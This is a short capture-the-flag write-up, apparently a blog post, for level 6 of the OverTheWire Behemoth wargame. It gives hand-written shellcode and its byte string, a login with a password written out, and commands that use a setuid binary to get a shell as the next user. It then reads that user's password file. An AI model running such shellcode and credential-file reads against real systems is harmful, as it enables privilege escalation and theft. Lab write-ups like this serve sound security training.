hacktracking: # Behemoth wargame: Level 6

# Behemoth wargame: Level 6

# cat hellokitty.asm
BITS 32
xor eax,eax
mov byte al,0x74
mov byte ah,0x79
push eax
push long 0x74694b6f
push long 0x6c6c6548
mov ecx,esp
cdq
mov byte dl,0xa
xor ebx,ebx
mov byte bl,0x1
xor eax,eax
mov byte al,0x4
int 0x80
leave
ret
# nasm -f elf hellokitty.asm && ld -o hellokitty hellokitty.o
# od2sc hellokitty
"\x31\xc0\xb0\x74\xb4\x79\x50\x68\x6f\x4b\x69\x74\x68\x48\x65\x6c\x6c\x89\xe1\x99\xb2\x0a\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\xc9\xc3"
# ssh behemoth6@behemoth.labs.overthewire.org
behemoth6@behemoth.labs.overthewire.org's password:6d617969726f65636865

behemoth6@melissa$ file /behemoth/behemoth6
/behemoth/behemoth6: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth6@melissa$ file /behemoth/behemoth6_reader
/behemoth/behemoth6_reader: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth6@melissa$ mkdir /tmp/b6
behemoth6@melissa$ cd !$
behemoth6@melissa$ perl -e 'print "\x31\xc0\xb0\x74\xb4\x79\x50\x68\x6f\x4b\x69\x74\x68\x48\x65\x6c\x6c\x89\xe1\x99\xb2\x0a\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\xc9\xc3"' > shellcode.txt
behemoth6@melissa$ /behemoth/behemoth6
Correct.
$ /usr/bin/whoami
behemoth7
$ /bin/cat /etc/behemoth_pass/behemoth7
626171756f787561666f
# Behemoth wargame: Level 6

No comments:
